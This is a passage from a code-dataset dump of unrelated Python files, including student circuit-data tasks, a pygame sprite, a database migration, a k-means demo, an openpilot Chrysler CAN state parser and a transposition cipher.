except:\n print(\"can not find the projectID with given circuitID\")\n return projectid\n\n# Task2\ndef getComponentCountByStudent(studentName, componentSymbol):\n #read student.dat get target student id\n studentid = readstudent(studentName,None)\n componentdist = set()\n\n #read all circuit.dat\n componentlist = []\n count = 0\n for filename in glob.glob(os.path.join('circuits/*.dat')):\n ids,component = readcircuitfiles(filename)\n if studentid in ids:\n componentlist += component\n if componentlist == []:\n return 0\n componentMap = readcomponent(componentSymbol)\n for components in componentlist:\n if components in componentMap.keys():\n if components not in componentdist:\n count += 1\n componentdist.add(components)\n return count\n\n#Task1\ndef getComponentCountByProject(projectID, componentSymbol):\n #read project.dat\n targetcircuitid,_ = readprojectid()\n try:\n circuitids = targetcircuitid[projectID]\n except:\n raise ValueError(\"the project ID provided does not exists\")\n #read symbol.dat\n componentMap = readcomponent(componentSymbol)\n\n componentdist = set()\n\n #read components from different circuit.dat\n count = 0\n for circuitid in circuitids:\n _,components = helpreadcircuitfiles(circuitid)\n for component in components:\n if str(component) in componentMap.keys():\n if str(component) not in componentdist:\n count += 1\n componentdist.add(str(component))\n return count\n\n# # ######################################################\nif __name__ == \"__main__\":\n #task1\n #print(getComponentCountByProject(\"082D6241-40EE-432E-A635-65EA8AA374B61\", \"R\"))\n\n #task2\n #studentlist = readstudentid()\n #for student in studentlist:\n # print('student is '+ student.name, getComponentCountByStudent(student.name,\"R\"))\n #print(getComponentCountByStudent(\"Adams, Keit\",\"R\"))\n\n #task3\n #print(getParticipationByStudent(\"Adams, Keit\"))\n\n #task4\n #print(getParticipationByProject('082D6241-40EE-432E-A635-65EA8AA374B61'))\n\n #task5\n #print(getCostOfProjects())\n\n #task6\n #print(getProjectByComponent({'RNW-02','HRK-348','KSR-430'}))\n\n #task7\n #print(getCommonByProject(\"56B13184-D087-48DB-9CBA-84B40FE17CC5\", \"0F1FABFA-E112-4A66-A0B0-B7A2C14AD39A1\"))\n\n #task8\n #print(getComponentReport({'RTD-159', 'MGC-590', 'OLW-497', 'SLT-436', 'TMS-946'}))\n #print(getComponentReport({'MGC-59'}))\n\n #task9\n #print(getCircuitByStudent({\"Adams, Keit\",\"Alexander, Carlos\",\"Allen, Amanda\"}))\n\n #task10\n print(getCircuitByComponent({'SLT-436'}))\n pass\n","sub_path":"ECE364SoftwareEngineeringToolsLab/Prelab03/collectionTasks.py","file_name":"collectionTasks.py","file_ext":"py","file_size_in_byte":12098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419599372","text":"'''구현자: 2019038026 이혁수'''\r\nimport pygame\r\nfrom game.data.obj.Setting import setting as s\r\n\r\n\r\n\r\npygame.mixer.init()\r\nballsound=pygame.mixer.Sound('game/audio/tick.wav')\r\nballsound.set_volume(0.5)\r\n\r\ndef to_Zero(num):\r\n '''관성구현을 휘한 함수'''\r\n if num < 0:\r\n return 1*s.time_adjustment\r\n elif num > 0:\r\n return -1*s.time_adjustment\r\n else:\r\n return 0\r\n\r\n\r\nclass Ball(pygame.sprite.Sprite):\r\n def __init__(self, img, location, area): # 이미지,시작죄표, 반환점 좌표,넓이와 높이를 튜플로 전달 ex: (가로,세로),FPS\r\n pygame.sprite.Sprite.__init__(self) #스프라이트 초기화\r\n self.image = pygame.transform.scale(img, area) # 이미지의 크기를 내가 원하는 크기로 조정\r\n self.rect = self.image.get_rect() # 이미지의 사각형에 해당하는 범위를 가져옴\r\n self.rect.topleft = location #위치 설정\r\n self.mask = pygame.mask.from_surface(self.image)#충돌감지를 위한 마스크 생성\r\n\r\n #함수내용 구현시 필요 한것\r\n if s.FPS==60:\r\n self.gravity=s.MAX_SPEED/s.FPS*1.75 #왕복하는데 걸리는 프레임\r\n elif s.FPS==30:\r\n self.gravity = s.MAX_SPEED / s.FPS * 1.25\r\n\r\n self.speed=[0,0] #공의 속도를 조정 [x,y]\r\n self.dontchangespeed=0 # 좌우스피드 변경 불가능하게 하는 프레임수\r\n\r\n\r\n def move_y(self):\r\n '''y이동을 계산하는 함수로 y는 공기준으로 위가 - 아래가 +'''\r\n x,y=self.rect.center\r\n\r\n #속도변화\r\n self.speed[1]+=self.gravity\r\n\r\n #y이동\r\n y+=self.speed[1]\r\n self.rect.center=(x,y) #좌표값변경\r\n\r\n\r\n\r\n def move_x(self,a):\r\n '''x를 이동 a는 가속도(속도 최대 값 있음)'''\r\n #x는 공기준으로 오른쪽이 + 왼쪽이 -\r\n x,y=self.rect.center\r\n\r\n #속도변화\r\n if a==0:\r\n self.speed[0]+=to_Zero(self.speed[0])\r\n else:\r\n self.speed[0] += a*s.time_adjustment\r\n\r\n #최대 속도 제한\r\n if self.speed[0]<-s.MAX_SPEED:\r\n self.speed[0]=-s.MAX_SPEED\r\n\r\n elif self.speed[0]>s.MAX_SPEED:\r\n self.speed[0]=s.MAX_SPEED\r\n\r\n #x이동\r\n x += self.speed[0]\r\n self.rect.center=(x,y) #좌표값변경\r\n\r\n\r\n def movex(self):\r\n '''x를 외부 요인 없이 그냥이동'''\r\n x,y=self.rect.center\r\n\r\n x += self.speed[0]\r\n\r\n self.rect.center = (x, y) # 좌표값변경\r\n\r\n\r\n def move_check(self,key):\r\n '''어떻게 이동할 것인지 체크 후 이동'''\r\n if self.dontchangespeed==0:\r\n self.move_x(key)\r\n #x축 속도 변화 없음\r\n else:\r\n self.dontchangespeed-=1\r\n self.movex()\r\n\r\n self.move_y()\r\n\r\n if self.rect.top>s.height or self.rect.bottom<0:\r\n return 1\r\n elif self.rect.left<0:\r\n self.rect.left=0\r\n elif self.rect.right>s.width:\r\n self.rect.right=0\r\n\r\n return 0\r\n\r\n def speed_set_y(self,sp):\r\n '''y축 속도 변경'''\r\n self.speed[1]=sp\r\n '''if s.FPS==30:\r\n self.speed[1]+=1'''\r\n ballsound.play()\r\n\r\n def speed_set_x(self,s):\r\n '''x축 속도 변경'''\r\n self.speed[0]=s\r\n\r\n def get_speed_x(self):\r\n '''y의 속도를 받아옴'''\r\n return self.speed[0]\r\n\r\n def get_speed_y(self):\r\n '''y의 속도를 받아옴'''\r\n return self.speed[1]\r\n\r\n def get_speed(self,index=2):\r\n '''speed를 반환 인자로 0을 넣으면 x의 속도가 1을 넣으면 y의 속도가 반환 됨'''\r\n try:\r\n return self.speed[index]\r\n except IndexError:\r\n return self.speed\r\n\r\n def set_dontchangespeed(self):\r\n '''몇프레임 동안 못움직이게 하는지 체크하는 변수의 값변경'''\r\n self.dontchangespeed=s.FPS/6\r\n\r\n def reverse_speed_x(self):\r\n '''x축의 속도를 뒤집음(즉, 방향을 바꿈)'''\r\n self.speed[0]=-self.speed[0]\r\n\r\n def reverse_speed_y(self):\r\n '''y축의 속도를 뒤집음(즉, 방향을 바꿈)'''\r\n self.speed[1]=-self.speed[1]\r\n\r\n def get_center(self,index=2):\r\n '''rect.center를 반환 인자로 0을 넣으면 x좌표가 1을 넣으면 y좌표가 반환 됨'''\r\n try:\r\n return self.rect.center[index]\r\n except IndexError:\r\n return self.rect.center\r\n\r\n def set_location(self,loc):\r\n self.rect.center=loc","sub_path":"프로젝트/obj/Ball.py","file_name":"Ball.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"653925495","text":"\"\"\"chat table edit2\n\nRevision ID: 408f8eea220e\nRevises: \nCreate Date: 2018-05-16 03:38:36.735978\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '408f8eea220e'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('admin',\n sa.Column('n', sa.Integer(), nullable=False),\n sa.Column('password_hash_admin', sa.String(length=128), nullable=True),\n sa.Column('id', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('n')\n )\n op.create_table('chat',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('group',\n sa.Column('group_image', sa.String(length=128), nullable=True),\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('group_name', sa.String(length=64), nullable=True),\n sa.Column('creator', sa.Integer(), nullable=True),\n sa.Column('discussion', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_group_creator'), 'group', ['creator'], unique=False)\n op.create_index(op.f('ix_group_discussion'), 'group', ['discussion'], unique=False)\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(length=128), nullable=True),\n sa.Column('email', sa.String(length=128), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('is_admin', sa.Boolean(), nullable=True),\n sa.Column('group', sa.Integer(), nullable=True),\n sa.Column('applicant', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('chat_content',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('content', sa.String(length=128), nullable=True),\n sa.Column('author', sa.Integer(), nullable=True),\n sa.Column('chat_group', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['chat_group'], ['chat.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('post',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('context', sa.String(length=1024), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_post_context'), 'post', ['context'], unique=False)\n op.create_index(op.f('ix_post_timestamp'), 'post', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_post_timestamp'), table_name='post')\n op.drop_index(op.f('ix_post_context'), table_name='post')\n op.drop_table('post')\n op.drop_table('chat_content')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n op.drop_index(op.f('ix_group_discussion'), table_name='group')\n op.drop_index(op.f('ix_group_creator'), table_name='group')\n op.drop_table('group')\n op.drop_table('chat')\n op.drop_table('admin')\n # ### end Alembic commands ###\n","sub_path":"Practice2/migrations/versions/408f8eea220e_chat_table_edit2.py","file_name":"408f8eea220e_chat_table_edit2.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"489543517","text":"import matplotlib\n\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.cluster import KMeans\n\nX = np.array([\n [1, 2],\n [1.5, 1.8],\n [5, 8],\n [8, 8],\n [1, 0.6],\n [9, 11]\n])\n\n# plt.scatter(X[:,0],X[:, 1], s=150)\n# plt.show()\n\nclf = KMeans(n_clusters=2)\n# 分成两波\nclf.fit(X)\n\ncentroids = clf.cluster_centers_\n#  中心点\nlabels = clf.labels_\n# 被分的标签\n\ncolors = 10*[\"g\", 'r', 'c', 'k', 'b']\nfor i in range(len(X)):\n print(X[i][0], X[i][1])\n plt.scatter(X[i][0], X[i][1], c=colors[labels[i]], s=50)\nplt.scatter(centroids[:, 0], centroids[:, 1], marker='x', s=150)\n\nplt.show()\n","sub_path":"MachineLearning/clustering/k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"29697890","text":"# -*- coding: utf-8 -*-\n\n\"Creates input configuration files for SR simulation\"\n\nimport os\n\nfilebase = 'sr_const'\nstapleFile = 'snodin_staples'\njsonFile = 'snodin_unbound'\ntemplate = 'inps/input_template.inp'\n\ndef read_seqfile(filename):\n \"\"\"Read seq files in ??? format and strip metadata.\"\"\"\n with open(filename) as inp:\n seqs = inp.read().split('\\n')\n seqs = [seq for seq in seqs if not '>' in seq]\n seqs = [seq for seq in seqs if seq != '']\n\n return seqs # a list of string sequences\n\ndef change_param(tempParams, parameter, append):\n \"\"\"Changes the parameter from the input configuration template\"\"\"\n index = [k for k, s in enumerate(tempParams) if parameter in s][0]\n tempParams[index] = '{}={}'.format(parameter, append)\n return tempParams\n\nwith open(template, 'r') as file:\n params = file.readlines()\n\n# Make directory for outputs\nif not os.path.exists('configs'):\n os.makedirs('configs')\n\nnumberOfStaples = len(read_seqfile('inps/{}.seq'.format(stapleFile)))\n\nfor i in range(numberOfStaples + 1): # iterate through all simulation setups\n tempParams = params[:] # copy parameters without reference \n \n # Manually change the parameters that are different\n # Input JSON Filename\n keyword = 'origami_input_filename'\n newParam = '{}_{}.json\\n'.format(jsonFile, i)\n tempParams = change_param(tempParams, keyword, newParam)\n \n # Output Directory\n keyword = 'output_filebase'\n newParam = 'outs_{}/{}_{}\\n'.format(filebase, i, i)\n tempParams = change_param(tempParams, keyword, newParam) \n \n # Create the input configuration file\n output = 'configs/{}_{}.inp'.format(filebase, i)\n with open(output, 'w') as file:\n file.writelines(tempParams)","sub_path":"scripts/investigation/single-removal/create_sr_input-configs.py","file_name":"create_sr_input-configs.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"595448570","text":"\n\n#calss header\nclass _RAPE():\n\tdef __init__(self,): \n\t\tself.name = \"RAPE\"\n\t\tself.definitions = [u'(an example of) the crime of forcefully having sex with someone against their wishes: ', u'destruction of the natural world, often for profit: ', u'a plant with yellow flowers from which oil and animal food are produced']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_rape.py","file_name":"_rape.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"177090160","text":"from cereal import car\nfrom opendbc.can.parser import CANParser\nfrom opendbc.can.can_define import CANDefine\nfrom selfdrive.car.chrysler.chryslerlonghelper import SET_SPEED_MIN\nfrom selfdrive.config import Conversions as CV\nfrom selfdrive.car.interfaces import CarStateBase\nfrom selfdrive.car.chrysler.values import DBC, STEER_THRESHOLD\nfrom common.params import Params\n\n\nclass CarState(CarStateBase):\n def __init__(self, CP):\n super().__init__(CP)\n can_define = CANDefine(DBC[CP.carFingerprint][\"pt\"])\n self.shifter_values = can_define.dv[\"GEAR\"][\"PRNDL\"]\n self.acc_on_button = False\n self.veh_on_timer = 0\n self.axle_torq = 0\n\n def update(self, cp, cp_cam):\n\n ret = car.CarState.new_message()\n\n ret.doorOpen = any([cp.vl[\"DOORS\"][\"DOOR_OPEN_FL\"],\n cp.vl[\"DOORS\"][\"DOOR_OPEN_FR\"],\n cp.vl[\"DOORS\"][\"DOOR_OPEN_RL\"],\n cp.vl[\"DOORS\"][\"DOOR_OPEN_RR\"]])\n ret.seatbeltUnlatched = cp.vl[\"SEATBELT_STATUS\"][\"SEATBELT_DRIVER_UNLATCHED\"] == 1\n\n ret.brakePressed = cp.vl[\"BRAKE_2\"][\"BRAKE_PEDAL\"] == 1 # driver-only\n ret.brake = cp.vl[\"BRAKE_1\"][\"BRAKE_VAL_TOTAL\"]\n ret.brakeLights = bool(cp.vl[\"BRAKE_2\"][\"BRAKE_LIGHT\"])\n ret.gas = cp.vl[\"ACCEL_GAS_22F\"][\"GAS_PEDAL_POS\"]\n ret.gasPressed = ret.gas > 1e-5\n\n ret.espDisabled = (cp.vl[\"TRACTION_BUTTON\"][\"TRACTION_OFF\"] == 1)\n\n ret.wheelSpeeds.fl = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_FL\"]\n ret.wheelSpeeds.rr = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_RR\"]\n ret.wheelSpeeds.rl = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_RL\"]\n ret.wheelSpeeds.fr = cp.vl[\"WHEEL_SPEEDS\"][\"WHEEL_SPEED_FR\"]\n ret.vEgoRaw = cp.vl[\"BRAKE_1\"][\"VEHICLE_SPEED_KPH\"] * CV.KPH_TO_MS\n ret.vEgo, ret.aEgo = self.update_speed_kf(ret.vEgoRaw)\n ret.standstill = bool(cp.vl[\"BRAKE_1\"][\"STANDSTILL\"])\n self.long_accel = cp.vl[\"INERTIAL_SENSOR\"][\"LONG_ACCEL\"]\n self.hill_accel_raw = self.long_accel - ret.aEgo\n self.hill_accel, self.hill_accel_rate = self.update_hill_kf(self.hill_accel_raw)\n\n ret.leftBlinker = cp.vl[\"STEERING_LEVERS\"][\"TURN_SIGNALS\"] == 1\n ret.rightBlinker = cp.vl[\"STEERING_LEVERS\"][\"TURN_SIGNALS\"] == 2\n ret.steeringAngleDeg = cp.vl[\"STEERING\"][\"STEER_ANGLE\"]\n ret.steeringRateDeg = cp.vl[\"STEERING\"][\"STEERING_RATE\"]\n ret.gearShifter = self.parse_gear_shifter(self.shifter_values.get(cp.vl[\"GEAR\"][\"PRNDL\"], None))\n\n self.acc_on_button_prev = self.acc_on_button\n self.acc_on_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_BUTTON_ON\"])\n\n ret.cruiseState.enabled = bool(cp.vl[\"ACC_2\"][\"ACC_ENABLED\"]) # ACC is green.\n ret.cruiseState.available = bool(cp.vl[\"ACC_2\"][\"ACC_AVAILABLE\"])\n ret.cruiseState.speed = max(cp.vl[\"DASHBOARD\"][\"ACC_SET_SPEED_MPH\"] * CV.MPH_TO_MS, SET_SPEED_MIN)\n # CRUISE_STATE is a three bit msg, 0 is off, 1 and 2 are Non-ACC mode, 3 and 4 are ACC mode, find if there are other states too\n ret.cruiseState.nonAdaptive = cp.vl[\"DASHBOARD\"][\"CRUISE_STATE\"] in [1, 2]\n\n ret.steeringTorque = cp.vl[\"EPS_STATUS\"][\"TORQUE_DRIVER\"]/4\n ret.steeringTorqueEps = cp.vl[\"EPS_STATUS\"][\"TORQUE_MOTOR\"]/4 if Params().get_bool(\"ChryslerMangoLat\") else cp.vl[\"EPS_STATUS\"][\"TORQUE_MOTOR\"]\n ret.steeringPressed = abs(ret.steeringTorque) > STEER_THRESHOLD/4\n self.steerError = cp.vl[\"EPS_STATUS\"][\"LKAS_STEER_FAULT\"] == 4\n self.apaFault = cp.vl[\"EPS_STATUS\"][\"APA_STEER_FAULT\"] == 1\n self.apasteerOn = cp.vl[\"EPS_STATUS\"][\"APA_ACTIVE\"] == 1\n\n ret.genericToggle = bool(cp.vl[\"STEERING_LEVERS\"][\"HIGH_BEAM_FLASH\"])\n\n if self.CP.enableBsm:\n ret.leftBlindspot = cp.vl[\"BLIND_SPOT_WARNINGS\"][\"BLIND_SPOT_LEFT\"] == 1\n ret.rightBlindspot = cp.vl[\"BLIND_SPOT_WARNINGS\"][\"BLIND_SPOT_RIGHT\"] == 1\n\n self.lkas_counter = cp_cam.vl[\"LKAS_COMMAND\"][\"COUNTER\"]\n self.lkas_status_ok = cp_cam.vl[\"LKAS_HEARTBIT\"][\"LKAS_BUTTON_LED\"]\n self.apa_steer_status = cp.vl[\"AUTO_PARK_REQUEST\"][\"APA_STEER_ACT\"] == 1\n if self.CP.enablehybridEcu:\n if cp.vl[\"HYBRID_ECU\"][\"VEH_ON\"] == 1:\n self.veh_on_timer += 1\n else:\n self.veh_on_timer = 0\n self.veh_on = self.veh_on_timer >= 50\n self.axle_torq = cp.vl[\"AXLE_TORQ\"][\"AXLE_TORQ\"]\n self.axle_torq_max = cp.vl[\"AXLE_TORQ\"][\"AXLE_TORQ_MAX\"]\n self.axle_torq_min = cp.vl[\"AXLE_TORQ\"][\"AXLE_TORQ_MIN\"]\n self.hybrid_power_meter = cp.vl[\"HEV_HMI\"][\"ELEC_MODE_PERCENT\"]\n else:\n self.veh_on_timer += 1\n self.veh_on = self.veh_on_timer >= 200\n self.axle_torq_min = 20.\n self.axle_torq_max = 300.\n self.hybrid_power_meter = 1\n\n self.acc_hold = bool(cp.vl[\"ACC_2\"][\"ACC_STOP\"])\n self.lead_dist = cp.vl[\"DASHBOARD\"][\"LEAD_DIST\"]\n self.wheel_button_counter = cp.vl[\"WHEEL_BUTTONS\"][\"COUNTER\"]\n\n self.acc_cancel_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_CANCEL\"])\n self.acc_resume_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_RESUME\"])\n self.acc_setplus_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_SPEED_INC\"])\n self.acc_setminus_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_SPEED_DEC\"])\n self.acc_followdec_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_FOLLOW_DEC\"])\n self.acc_followinc_button = bool(cp.vl[\"WHEEL_BUTTONS\"][\"ACC_FOLLOW_INC\"])\n\n self.acc_button_pressed = self.acc_cancel_button or self.acc_resume_button or self.acc_setplus_button or \\\n self.acc_setminus_button or self.acc_followdec_button or self.acc_followinc_button\n\n ret.accgasOverride = bool(cp.vl[\"ACCEL_RELATED_120\"][\"ACC_OVERRIDE\"])\n self.accbrakeFaulted = ((cp.vl[\"BRAKE_2\"][\"ACC_BRAKE_FAIL\"]) > 0) or ((cp.vl[\"ACC_ERROR\"][\"ACC_ERROR\"]) > 0)\n self.accengFaulted = (cp.vl[\"ACCEL_RELATED_120\"][\"ACC_ENG_OK\"]) == 0\n\n return ret\n\n @staticmethod\n def get_can_parser(CP):\n signals = [\n # sig_name, sig_address, default\n (\"PRNDL\", \"GEAR\", 0),\n (\"DOOR_OPEN_FL\", \"DOORS\", 0),\n (\"DOOR_OPEN_FR\", \"DOORS\", 0),\n (\"DOOR_OPEN_RL\", \"DOORS\", 0),\n (\"DOOR_OPEN_RR\", \"DOORS\", 0),\n (\"BRAKE_PEDAL\", \"BRAKE_2\", 0),\n (\"GAS_PEDAL_POS\", \"ACCEL_GAS_22F\", 0),\n (\"WHEEL_SPEED_FL\", \"WHEEL_SPEEDS\", 0),\n (\"WHEEL_SPEED_RR\", \"WHEEL_SPEEDS\", 0),\n (\"WHEEL_SPEED_RL\", \"WHEEL_SPEEDS\", 0),\n (\"WHEEL_SPEED_FR\", \"WHEEL_SPEEDS\", 0),\n (\"STEER_ANGLE\", \"STEERING\", 0),\n (\"STEERING_RATE\", \"STEERING\", 0),\n (\"TURN_SIGNALS\", \"STEERING_LEVERS\", 0),\n (\"ACC_ENABLED\", \"ACC_2\", 0),\n (\"ACC_AVAILABLE\", \"ACC_2\", 0),\n (\"HIGH_BEAM_FLASH\", \"STEERING_LEVERS\", 0),\n (\"ACC_SET_SPEED_MPH\", \"DASHBOARD\", 0),\n (\"LEAD_DIST\", \"DASHBOARD\", 0),\n (\"CRUISE_STATE\", \"DASHBOARD\", 0),\n (\"TORQUE_DRIVER\", \"EPS_STATUS\", 0),\n (\"DRIVER_TAKEOVER\", \"EPS_STATUS\", 0),\n (\"TORQUE_MOTOR\", \"EPS_STATUS\", 0),\n (\"LKAS_STEER_FAULT\", \"EPS_STATUS\", 0),\n (\"COUNTER\", \"EPS_STATUS\", -1),\n (\"TRACTION_OFF\", \"TRACTION_BUTTON\", 0),\n (\"SEATBELT_DRIVER_UNLATCHED\", \"SEATBELT_STATUS\", 0),\n (\"APA_ACTIVE\", \"EPS_STATUS\", 0),\n (\"APA_STEER_FAULT\", \"EPS_STATUS\", 0),\n (\"ACC_STOP\", \"ACC_2\", 0),\n (\"BLIND_SPOT_RIGHT\", \"BLIND_SPOT_WARNINGS\", 0),\n (\"BLIND_SPOT_LEFT\", \"BLIND_SPOT_WARNINGS\", 0),\n (\"COUNTER\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_RESUME\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_CANCEL\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_SPEED_INC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_SPEED_DEC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_FOLLOW_INC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_FOLLOW_DEC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_BUTTON_ON\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_DISTANCE_CONFIG_2\", \"DASHBOARD\", 0),\n (\"STANDSTILL\", \"BRAKE_1\", 0),\n (\"BRAKE_VAL_TOTAL\", \"BRAKE_1\", 0),\n (\"VEHICLE_SPEED_KPH\", \"BRAKE_1\", 0),\n (\"BRAKE_LIGHT\", \"BRAKE_2\", 0),\n (\"APA_STEER_ACT\", \"AUTO_PARK_REQUEST\", 0),\n (\"ACC_OVERRIDE\", \"ACCEL_RELATED_120\", 0),\n (\"ACC_BRAKE_FAIL\", \"BRAKE_2\", 0),\n (\"ACC_ENG_OK\", \"ACCEL_RELATED_120\", 0),\n (\"ACC_ERROR\", \"ACC_ERROR\", 0),\n (\"LONG_ACCEL\", \"INERTIAL_SENSOR\", 0),\n ]\n\n checks = [\n # sig_address, frequency\n (\"BRAKE_2\", 50),\n (\"EPS_STATUS\", 100),\n (\"SPEED_1\", 100),\n (\"WHEEL_SPEEDS\", 50),\n (\"STEERING\", 100),\n (\"ACC_2\", 50),\n (\"GEAR\", 50),\n (\"ACCEL_GAS_134\", 50),\n (\"DASHBOARD\", 15),\n (\"STEERING_LEVERS\", 10),\n (\"SEATBELT_STATUS\", 2),\n (\"DOORS\", 1),\n (\"TRACTION_BUTTON\", 1),\n (\"BLIND_SPOT_WARNINGS\", 2),\n (\"BRAKE_1\", 50),\n (\"AUTO_PARK_REQUEST\", 50),\n (\"WHEEL_BUTTONS\", 1),\n (\"ACCEL_GAS_22F\", 50),\n (\"ACCEL_RELATED_120\", 50),\n (\"ACC_ERROR\", 0),\n (\"INERTIAL_SENSOR\", 50),\n ]\n\n if CP.enablehybridEcu:\n signals += [\n (\"VEH_ON\", \"HYBRID_ECU\", 0),\n (\"AXLE_TORQ\", \"AXLE_TORQ\", 0),\n (\"AXLE_TORQ_MIN\", \"AXLE_TORQ\", 0),\n (\"AXLE_TORQ_MAX\", \"AXLE_TORQ\", 0),\n (\"ELEC_MODE_PERCENT\", \"HEV_HMI\", 0),\n ]\n checks += [\n (\"HYBRID_ECU\", 1),\n (\"AXLE_TORQ\", 100),\n (\"HEV_HMI\", 10),\n ]\n\n if CP.enableBsm:\n signals += [\n (\"BLIND_SPOT_RIGHT\", \"BLIND_SPOT_WARNINGS\", 0),\n (\"BLIND_SPOT_LEFT\", \"BLIND_SPOT_WARNINGS\", 0),\n ]\n checks += [(\"BLIND_SPOT_WARNINGS\", 2)]\n\n return CANParser(DBC[CP.carFingerprint][\"pt\"], signals, checks, 0)\n\n @staticmethod\n def get_cam_can_parser(CP):\n signals = [\n # sig_name, sig_address, default\n (\"COUNTER\", \"LKAS_COMMAND\", -1),\n (\"LKAS_BUTTON_LED\", \"LKAS_HEARTBIT\", -1)\n ]\n checks = [\n (\"LKAS_COMMAND\", 100),\n (\"LKAS_HEARTBIT\", 10),\n (\"LKAS_HUD\", 4),\n ]\n\n return CANParser(DBC[CP.carFingerprint][\"pt\"], signals, checks, 2)\n","sub_path":"selfdrive/car/chrysler/carstate.py","file_name":"carstate.py","file_ext":"py","file_size_in_byte":9586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"227121754","text":"class Solution(object):\n def numJewelsInStones(self, J, S):\n \"\"\"\n :type J: str\n :type S: str\n :rtype: int\n \"\"\"\n dict = {}\n for x in J:\n dict[x] = 1\n i = 0\n for x in S:\n if x in dict:\n i += 1\n return i\n\n\nJ = \"aA\"\nS = \"aAAbbbb\"\nprint(Solution().numJewelsInStones(J, S))\n","sub_path":"vol 7/771.py","file_name":"771.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"199545389","text":"import math\n\ndef main ():\n\tmessage = input(\"Enter you message: \")\n\tkey = int(input(\"Enter the key: \"))\n\tmode = input(\"Enter (E) to encrypt or (D) to decrypt: \")\n\tif mode.lower() == \"e\":\n\t\tciphertext = encryptMessage(key, message)\n\t\tprint(ciphertext + ' end')\n\telif mode.lower() == \"d\":\n\t\tdecrypt_text = decryptMessage(key, message)\n\t\tprint(decrypt_text + ' end')\n\ndef encryptMessage(myKey, myMessage):\n\tciphertext = [''] * myKey\n\tfor col in range(myKey):\n\t\tpointer = col\n\t\t\n\t\twhile pointer < len(myMessage):\n\t\t\tciphertext[col] += myMessage[pointer]\n\t\t\tpointer += myKey\n\treturn ''.join(ciphertext)\n\ndef decryptMessage(myKey, myMessage):\n\tnumber_of_cols = math.ceil(len(myMessage)/myKey)\n\tnumber_of_rows = myKey\n\tshaded = (number_of_rows*number_of_cols) - len(myMessage)\n\t\n\tcol = 0\n\trow = 0\n\n\tplain_text = ['']*number_of_cols\n\t\n\tfor char in myMessage:\n\t\tplain_text[col] += char\n\t\tcol += 1\n\t\tif (col == number_of_cols) or (col == number_of_cols - 1 and row >= number_of_rows - shaded):\n\t\t\tcol = 0\n\t\t\trow += 1\n\treturn ''.join(plain_text)\n\t\n\n\nif __name__ == 